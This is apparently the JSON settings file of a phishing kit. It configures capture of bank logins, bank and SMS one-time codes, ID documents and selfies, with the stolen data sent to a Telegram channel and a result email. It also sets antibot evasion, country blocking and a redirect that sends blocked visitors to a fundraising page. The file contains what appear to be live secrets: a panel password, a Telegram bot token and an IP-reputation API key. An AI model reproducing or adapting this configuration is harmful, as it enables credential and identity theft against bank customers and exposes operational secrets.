{
    "password": "Huha123!@#",
    "email": "yourresultemailhere@gmail.com",
    "parameter": "signin2",
    "antibot": "none",
    "antibotStatus": "off",
    "LoginMail": "on",
    "otpsms": null,
    "doubleEmpas": "on",
    "ipQuality": "gjhjSUVMrjfJn1SnIOTob99MEMM2HkfL",
    "IQSStatus": "off",
    "Userid": "6361718161:AAHYOdhZiiEeTdkG5T9PIyTlDsE5HkEf-rg",
    "IDStatus": "on",
    "papSelfie": "on",
    "bankStatus": "on",
    "otpAttempt": "3",
    "ChanelID": "6827196222",
    "TelegramStatus": "on",
    "redirectblock": "https:\/\/www.gofundme.com\/f\/nicole-angelic",
    "BlockCStatus": null,
    "BlockCountry": "['ID','JP','US']",
    "bankLanding": "on",
    "AuthAttempt": "on",
    "addbankname": null,
    "BankOTP": "3",
    "StopbotStatus": "off",
    "stopbot": "",
    "otpMAil": "on",
    "Title": null,
    "Isi": null
}